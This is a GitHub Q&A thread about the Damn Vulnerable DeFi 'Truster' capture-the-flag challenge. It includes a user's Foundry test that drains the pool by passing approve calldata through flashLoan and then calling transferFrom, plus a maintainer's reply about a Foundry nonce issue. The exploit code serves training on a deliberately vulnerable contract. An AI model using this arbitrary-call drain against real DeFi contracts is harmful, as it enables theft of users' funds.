### DISCUSSION TITLE
Truster::getNonce says I have 0 txn

### DISCUSSION THREAD

**Discussion by JJScar** [tinchoabbate/damn-vulnerable-defi#71] [Help / Q&A / Troubleshooting] [answered]
I managed to solve the Truster challenge but I though that it took me two transactions. But to my surprise it says I made 0...
Don't really know how that makes sense?... BTW my solution is attached so spoiler! (maybe)

If anyone can look at the code and perhaps nudge me into a direction I'd love that:

```javascript
function test_truster() public checkSolvedByPlayer {
        bytes memory data = abi.encodeWithSignature("approve(address,uint256)", player, TOKENS_IN_POOL);
        pool.flashLoan(0, player, address(token), data);
        token.transferFrom(address(pool), player, TOKENS_IN_POOL);
        console.log("player nonce", vm.getNonce(player));
    }
```

```
VM::assertEq(0, 1, "Player executed more than one tx") [staticcall]
    │   └─ ← [Revert] Player executed more than one tx: 0 != 1
```

**Comment by JeremyZenora** [comment]
Interesting, I did this challenge a while back, but I solved it by just deploying contract and completing it in constructor. It counted as tx for me.

**Comment by tinchoabbate** [comment, marked as answer]
The nonce stuff is relate to a problem with Foundry, being discussed here #57. The single-transaction solution can be done with solving the challenge in the constructor of a contract.
